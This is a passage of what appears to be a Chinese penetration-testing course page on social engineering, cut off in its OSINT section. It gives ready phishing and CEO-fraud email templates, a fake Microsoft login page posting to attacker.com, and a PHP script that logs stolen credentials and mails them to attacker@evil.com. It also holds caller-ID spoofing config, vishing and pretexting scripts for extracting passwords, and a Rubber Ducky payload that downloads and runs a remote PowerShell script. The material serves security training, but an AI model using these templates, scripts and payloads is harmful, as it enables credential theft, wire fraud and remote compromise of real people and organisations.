公开文集
0x01 SRC 资产管理系统
0x02 Web 漏洞案例库
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x99 信息安全学习体系
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-037-XSS进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-141-应用安全总结与展望
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
Day-182-密码学系列总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
-
+
首页
Day-213-社会工程学攻击技术
# Day 217: 社会工程学攻击技术 > 渗透测试系列第 7 天 | 预计阅读时间:55 分钟 | 难度:★★★★☆ --- ## 清单 目录 1. [社会工程学概述](#社会工程学概述) 2. [社会工程学原理](#社会工程学原理) 3. [钓鱼攻击技术](#钓鱼攻击技术) 4. [语音钓鱼攻击](#语音钓鱼攻击) 5. [物理入侵技术](#物理入侵技术) 6. [ pretexting 借口技术](#pretexting 借口技术) 7. [社会工程学工具集](#社会工程学工具集) 8. [防御与检测](#防御与检测) 9. [社会工程学实战案例](#社会工程学实战案例) 10. [总结与思考](#总结与思考) 11. [参考资料](#参考资料) --- ## 社会工程学概述 ### 什么是社会工程学 社会工程学(Social Engineering)是通过操纵人的心理和行为,使其自愿泄露敏感信息或执行特定操作的非技术性攻击手段。 **社会工程学的核心定义**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 社会工程学定义 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 社会工程学 = 心理操纵 + 信任建立 + 信息收集 + 目标达成 │ │ │ │ 关键要素: │ │ 1. 心理操纵(Psychological Manipulation) │ │ - 利用人性弱点 │ │ - 触发情绪反应 │ │ - 绕过理性判断 │ │ │ │ 2. 信任建立(Trust Building) │ │ - 伪装可信身份 │ │ - 建立权威形象 │ │ - 制造紧迫感 │ │ │ │ 3. 信息收集(Information Gathering) │ │ - 公开情报收集 │ │ - 目标背景调查 │ │ - 弱点分析 │ │ │ │ 4. 目标达成(Objective Achievement) │ │ - 获取凭证 │ │ - 安装恶意软件 │ │ - 物理入侵 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 为什么社会工程学有效 **人性弱点利用**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 人性弱点利用 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. 乐于助人 │ │ - 攻击者伪装成需要帮助的员工 │ │ - 利用同情心获取信息 │ │ │ │ 2. 畏惧权威 │ │ - 伪装成高管、IT 管理员、执法人员 │ │ - 受害者不敢质疑 │ │ │ │ 3. 贪婪心理 │ │ - 中奖通知、高额回报 │ │ - 受害者忽视风险 │ │ │ │ 4. 好奇心 │ │ - 神秘附件、有趣链接 │ │ - 受害者忍不住点击 │ │ │ │ 5. 紧迫感 │ │ - "立即行动,否则账户将被冻结" │ │ - 受害者来不及思考 │ │ │ │ 6. 从众心理 │ │ - "已有 1000 人领取" │ │ - 受害者跟随大众 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 社会工程学攻击类型 | 类型 | 描述 | 常见场景 | |------|------|----------| | **钓鱼(Phishing)** | 邮件诱导 | 凭证窃取、恶意软件 | | **语音钓鱼(Vishing)** | 电话诈骗 | 凭证窃取、转账欺诈 | | **短信钓鱼(Smishing)** | 短信诱导 | 恶意链接、凭证窃取 | | **鱼叉钓鱼(Spear Phishing)** | 定向攻击 | 高管、财务人员 | | **鲸钓(Whaling)** | 高管定向 | CEO、CFO | | ** pretexting** | 借口欺骗 | 信息收集、物理入侵 | | **尾随(Tailgating)** | 物理跟随 | 进入受限区域 | | **诱饵(Baiting)** | 诱惑攻击 | USB 设备、免费软件 | --- ## 社会工程学原理 ### Cialdini 六大影响力原则 **社会工程学基于心理学原理**: ``` ┌─────────────────────────────────────────────────────────────┐ │ Cialdini 六大影响力原则 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. 互惠(Reciprocity) │ │ - 原理:人们倾向于回报他人的恩惠 │ │ - 攻击应用:先给小礼物,再请求信息 │ │ - 防御:警惕陌生人的"好意" │ │ │ │ 2. 承诺与一致(Commitment & Consistency) │ │ - 原理:人们希望保持言行一致 │ │ - 攻击应用:先获取小承诺,再获取大承诺 │ │ - 防御:不要轻易做出承诺 │ │ │ │ 3. 社会认同(Social Proof) │ │ - 原理:人们跟随大众行为 │ │ - 攻击应用:"已有 1000 人参与" │ │ - 防御:独立思考,不盲目从众 │ │ │ │ 4. 喜好(Liking) │ │ - 原理:人们更容易答应喜欢的人的请求 │ │ - 攻击应用:建立好感、找共同点 │ │ - 防御:保持职业距离 │ │ │ │ 5. 权威(Authority) │ │ - 原理:人们服从权威人物 │ │ - 攻击应用:伪装成高管、警察、IT 支持 │ │ - 防御:验证身份,不盲目服从 │ │ │ │ 6. 稀缺(Scarcity) │ │ - 原理:稀缺的东西更有价值 │ │ - 攻击应用:"限时优惠"、"仅剩 3 个名额" │ │ - 防御:理性评估,不被紧迫感左右 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 攻击生命周期 ``` ┌─────────────────────────────────────────────────────────────┐ │ 社会工程学攻击生命周期 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 阶段 1: 信息收集 │ │ ├── OSINT 收集 │ │ ├── 目标分析 │ │ └── 弱点识别 │ │ │ │ 阶段 2: 关系建立 │ │ ├── 伪装身份 │ │ ├── 建立信任 │ │ └── 降低警惕 │ │ │ │ 阶段 3: 利用执行 │ │ ├── 触发行动 │ │ ├── 获取信息 │ │ └── 安装后门 │ │ │ │ 阶段 4: 目标达成 │ │ ├── 数据窃取 │ │ ├── 系统入侵 │ │ └── 金融欺诈 │ │ │ │ 阶段 5: 痕迹清理 │ │ ├── 删除通信记录 │ │ ├── 清除日志 │ │ └── 消失无踪 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` --- ## 钓鱼攻击技术 ### 钓鱼邮件结构 **典型钓鱼邮件组成**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 钓鱼邮件结构 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 发件人伪装: │ │ ├── 相似域名:support@micr0soft.com │ │ ├── 显示名欺骗:"IT Support" <attacker@evil.com> │ │ └── spoofed 域名:伪造发件人域名 │ │ │ │ 主题行设计: │ │ ├── 紧迫感:"立即行动,否则账户将被冻结" │ │ ├── 好奇心:"您有一个新消息" │ │ ├── 利益诱惑:"恭喜您中奖了" │ │ └── 权威伪装:"来自 CEO 的紧急请求" │ │ │ │ 正文内容: │ │ ├── 伪造品牌标识 │ │ ├── 模仿官方语气 │ │ ├── 制造紧迫感 │ │ └── 明确的行动号召 │ │ │ │ 恶意元素: │ │ ├── 钓鱼链接:指向伪造网站 │ │ ├── 恶意附件:包含恶意软件 │ │ └── 二维码:绕过链接检测 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 钓鱼邮件模板 **IT 支持钓鱼**: ``` From: IT Support <support@company-security.com> Subject: 【紧急】您的账户需要立即验证 尊敬的员工, 我们检测到您的账户存在异常登录活动。为确保账户安全, 请立即点击以下链接验证您的身份: [立即验证账户] 如未在 24 小时内验证,您的账户将被暂时冻结。 感谢您的配合。 IT 安全团队 ``` **高管钓鱼(CEO Fraud)**: ``` From: CEO <ceo@company.com> (伪造) Subject: 紧急 - 需要立即处理 你好, 我正在开会,不方便接电话。 需要立即向供应商支付一笔紧急款项,金额:$50,000 请尽快处理,稍后我会补签字。 这是供应商账户信息: Bank: XXX Bank Account: 123456789 Routing: 987654321 请尽快确认。 CEO ``` **凭证窃取钓鱼**: ``` From: Microsoft <no-reply@microsoft-security.com> Subject: 您的 Microsoft 账户需要验证 亲爱的用户, 我们检测到您的账户存在安全风险。 请立即验证您的 Microsoft 账户,以防止账户被锁定。 [验证账户] Microsoft 安全团队 ``` ### 钓鱼网站制作 **伪造登录页面**: ```html <!-- 伪造 Microsoft 登录页 --> <!DOCTYPE html> <html> <head> <title>登录 - Microsoft 账户</title> <link rel="stylesheet" href="https://login.microsoftonline.com/css/style.css"> </head> <body> <div class="login-form"> <img src="microsoft-logo.png" alt="Microsoft"> <h2>登录到您的账户</h2> <form action="http://attacker.com/steal.php" method="POST"> <input type="email" name="email" placeholder="电子邮件" required> <input type="password" name="password" placeholder="密码" required> <button type="submit">登录</button> </form> <a href="#">忘记密码?</a> </div> </body> </html> ``` **凭证窃取脚本**: ```php <?php // steal.php if ($_POST) { $email = $_POST['email']; $password = $_POST['password']; $ip = $_SERVER['REMOTE_ADDR']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $date = date('Y-m-d H:i:s'); // 记录凭证 $log = "Date: $date | Email: $email | Pass: $password | IP: $ip | UA: $user_agent\n"; file_put_contents('credentials.txt', $log, FILE_APPEND); // 发送到攻击者 mail('attacker@evil.com', 'New Credential', $log); // 重定向到真实网站(降低怀疑) header('Location: https://login.microsoftonline.com'); } ?> ``` ### 钓鱼工具 **Gophish**: ```bash # 安装 Gophish $ wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip $ unzip gophish-v0.12.1-linux-64bit.zip $ ./gophish # 访问 Web 界面 https://localhost:3333 # 配置步骤: 1. 创建发送 Profile(SMTP 配置) 2. 创建 Landing Page(钓鱼页面) 3. 创建 Email Template(邮件模板) 4. 创建 Users & Groups(目标列表) 5. 创建 Campaign(启动钓鱼活动) 6. 查看结果(谁点击了、谁提交了凭证) ``` **Social Engineer Toolkit (SET)**: ```bash # 启动 SET $ sudo setoolkit # 菜单选项: 1) 社会工程学攻击 2) 渗透测试工具 3) 第三方模块 4) 更新 SET 5) 更新 Metasploit 6) 帮助 # 选择社会工程学攻击 1) 鱼叉式钓鱼攻击 2) 网站攻击 3) 感染媒介 4) 大规模邮件攻击 5) Arduino 攻击 6) 无线接入点攻击 7) QRCode 攻击 8) Powershell 攻击 9) 短信欺骗攻击 10) 摄像头攻击 11) 基于 DNS 的攻击 ``` --- ## 语音钓鱼攻击 ### Vishing 技术 **语音钓鱼流程**: ``` ┌─────────────────────────────────────────────────────────────┐ │ Vishing 攻击流程 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 准备阶段: │ │ ├── 目标研究(职位、部门、联系方式) │ │ ├── 脚本编写(标准话术) │ │ └── 号码伪装(Caller ID Spoofing) │ │ │ │ 执行阶段: │ │ ├── 建立信任(伪装身份) │ │ ├── 制造紧迫感(紧急问题) │ │ ├── 引导操作(获取信息/执行操作) │ │ └── 快速结束(避免暴露) │ │ │ │ 收尾阶段: │ │ ├── 清理痕迹 │ │ ├── 使用获取的信息 │ │ └── 准备下一次攻击 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` **常见 Vishing 场景**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 常见 Vishing 场景 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. IT 支持诈骗 │ │ - "我们是 IT 部门,检测到您的电脑有病毒" │ │ - "请下载安装这个安全工具" │ │ - 目标:安装远程访问工具 │ │ │ │ 2. 银行诈骗 │ │ - "我们检测到您的账户有异常交易" │ │ - "请提供卡号和验证码以冻结账户" │ │ - 目标:获取银行卡信息 │ │ │ │ 3. 税务诈骗 │ │ - "我是税务局,您欠税未缴" │ │ - "请立即转账,否则将被逮捕" │ │ - 目标:直接转账欺诈 │ │ │ │ 4. 高管诈骗 │ │ - "我是 CEO,需要紧急处理一笔付款" │ │ - "不要告诉任何人,这是机密" │ │ - 目标:财务转账 │ │ │ │ 5. 客服诈骗 │ │ - "您的订阅即将到期,需要续费" │ │ - "请提供支付信息以继续服务" │ │ - 目标:获取支付信息 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### Vishing 脚本示例 **IT 支持诈骗脚本**: ``` 攻击者:您好,我是公司 IT 支持中心的张工。 目标:哦,有什么事吗? 攻击者:我们监控系统检测到您的电脑可能感染了恶意软件, 需要立即处理。请问您现在方便吗? 目标:啊?我没发现什么问题啊。 攻击者:这种恶意软件很隐蔽,用户通常察觉不到。但它在后台 窃取公司数据。我们需要您配合安装一个安全工具来清理。 目标:好的,那怎么办? 攻击者:请您打开浏览器,访问这个网址:support-company-security.com 下载 Remote Support Tool,我们远程帮您清理。 目标:好的,我打开了。 攻击者:请点击"立即下载",然后运行程序。我们会获取临时权限 进行清理,大概需要 10 分钟。 目标:运行了,显示正在连接... 攻击者:好的,我看到了您的电脑。现在开始扫描... (获取远程访问权限,安装后门) ``` ### 号码伪装技术 ```bash # 使用 VoIP 服务伪装号码 # 服务示例: # - Twilio # - Vonage # -本地 VoIP 提供商 # 使用 VoIP 软件 $ asterisk -r # 配置 Caller ID exten => 123456789,1,Set(CALLERID(num)=+18005551234) exten => 123456789,2,Dial(SIP/target) # 在线服务(需注意合法性) # - SpoofCard # - BluffMyCall ``` --- ## 物理入侵技术 ### 尾随攻击(Tailgating) **尾随技术**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 尾随攻击技术 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 方法 1: 假装双手拿满物品 │ │ - 抱着纸箱、文件、咖啡 │ │ - 目标会出于礼貌帮忙开门 │ │ │ │ 方法 2: 假装打电话 │ │ - 一边打电话一边走近门禁 │ │ - 目标会以为你是同事帮忙开门 │ │ │ │ 方法 3: 假装吸烟/接电话 │ │ - 在门口吸烟或打电话 │ │ - 等有人出来时自然跟随进入 │ │ │ │ 方法 4: 伪装成送货员 │ │ - 穿快递员制服,拿包裹 │ │ - "有包裹要送到 X 部门" │ │ │ │ 方法 5: 假装遇到麻烦 │ │ - "我的卡失效了,能帮我开下门吗?" │ │ - 利用同情心 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 伪装入侵 **常见伪装身份**: | 身份 | 装备 | 适用场景 | |------|------|----------| | **快递员** | 快递制服、包裹、手持终端 | 进入大楼、前台 | | **维修工** | 工作服、工具箱、工牌 | 进入机房、办公区 | | **清洁工** | 清洁制服、清洁车 | 进入任何区域 | | **安保人员** | 保安制服、对讲机 | 进入受限区域 | | **IT 支持** | 商务休闲、笔记本电脑 | 进入办公区 | | **消防员** | 消防制服 | 紧急情况进入 | | ** caterer** | 餐饮制服、餐车 | 进入会议室、活动 | **伪造工牌**: ```bash # 使用 Photoshop 制作假工牌 # 元素包括: # - 公司 Logo # - 员工照片(可用 AI 生成) # - 姓名、部门 # - 条形码/二维码 # - 有效期 # 在线工牌生成器 # - ID Card Generator # - Badge Maker ``` ### USB 诱饵攻击 **USB 诱饵类型**: ``` ┌─────────────────────────────────────────────────────────────┐ │ USB 诱饵攻击 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 类型 1: 标签诱惑 │ │ - 标签:"工资单"、"奖金"、"裁员名单" │ │ - 目标:好奇心驱动 │ │ │ │ 类型 2: 公司相关 │ │ - 标签:"公司备份"、"财务数据"、"客户列表" │ │ - 目标:工作相关 curiosity │ │ │ │ 类型 3: 个人相关 │ │ - 标签:"照片"、"简历"、"个人资料" │ │ - 目标:个人 curiosity │ │ │ │ 类型 4: 技术相关 │ │ - 标签:"软件"、"工具"、"破解版" │ │ - 目标:技术兴趣 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` **恶意 USB 制作**: ```bash # 使用 Rubber Ducky $ cat payload.txt DELAY 1000 GUI r DELAY 500 STRING cmd ENTER DELAY 500 STRING powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" ENTER # 编译 Payload $ duckyscript payload.txt # 使用 BadUSB # - 伪装成键盘 # - 自动执行恶意命令 # - 绕过 USB 存储限制 ``` --- ## Pretexting 借口技术 ### Pretexting 原理 **Pretexting 定义**: ``` ┌─────────────────────────────────────────────────────────────┐ │ Pretexting 原理 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ Pretexting = 虚构场景 + 可信身份 + 合理理由 │ │ │ │ 关键要素: │ │ 1. 虚构场景(Fabricated Scenario) │ │ - 编造一个合理的故事 │ │ - 场景要符合逻辑 │ │ - 细节要真实可信 │ │ │ │ 2. 可信身份(Credible Persona) │ │ - 伪装成可信角色 │ │ - 准备相关"证据" │ │ - 语气、用词要专业 │ │ │ │ 3. 合理理由(Legitimate Reason) │ │ - 给目标一个合理的配合理由 │ │ - 制造紧迫感或权威性 │ │ - 让目标觉得"应该帮忙" │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 常见 Pretexting 场景 **IT 审计场景**: ``` 攻击者:您好,我是公司聘请的外部 IT 审计师李明。 目标:哦,有什么事吗? 攻击者:我们正在对公司的 IT 系统进行安全审计,需要核实 一些员工账户信息。请问您的工号是多少? 目标:我的工号是 12345。 攻击者:好的,谢谢。另外,为了验证账户权限,需要您提供 一下登录密码,我们会进行加密测试。 目标:密码?这个不太好吧... 攻击者:我理解您的顾虑。这是公司要求的审计流程,所有员工 都需要配合。如果您不方便,我可以让您的主管来确认。 目标:那...好吧,我的密码是 XXX。 攻击者:好的,非常感谢配合。审计结果会在下周公布。 ``` **HR 调查场景**: ``` 攻击者:您好,我是人力资源部的王经理。 目标:您好,有什么事吗? 攻击者:我们正在处理一起员工投诉,需要向您了解一些情况。 请问您认识张 XX 吗? 目标:认识,他是技术部的同事。 攻击者:好的。请问您最近有没有发现他有什么异常行为? 比如泄露公司数据、违规操作等。 目标:这个...好像没有吧。 攻击者:好的。另外,为了调查需要,我们需要查看一下 您和他之间的邮件往来。请您登录邮箱,转发一下 最近的邮件给我。 目标:这个需要主管批准吧? 攻击者:这是 HR 的调查权限,不需要额外批准。如果您不方便, 我可以让 IT 直接从后台调取。 目标:那我自己转发吧... ``` **供应商调查场景**: ``` 攻击者:您好,我是 XX 软件公司的技术支持赵工。 目标:您好。 攻击者:贵公司购买的我们的软件即将到期,需要续费。 请问负责采购的同事是哪位? 目标:应该是采购部的李经理。 攻击者:好的,能给我一下他的联系方式吗?我直接联系他 办理续费手续。 目标:他的邮箱是 li@company.com。 攻击者:好的,谢谢。另外,为了确认授权,请问贵公司 的采购审批流程是怎样的?需要哪些人签字? 目标:一般是采购经理签字,然后财务付款。 攻击者:明白了,非常感谢。 ``` --- ## 社会工程学工具集 ### OSINT 收集工具 **人员信息收集**: ```bash # theHarvester - 收集邮箱、子域名 $ theHarvester -d target.com -b google,linkedin # hunter.io - 查找邮箱格式 $ curl "https://api.hunter.io/v2/domain-search?domain=target.com&api_key=YOUR_KEY" # Clearbit - 公司信息查询 $ curl "https://company.clearbit.com/v1/domains/find?domain=target.com" # LinkedIn 搜索 # 手动搜索目标公司员工 # 使用 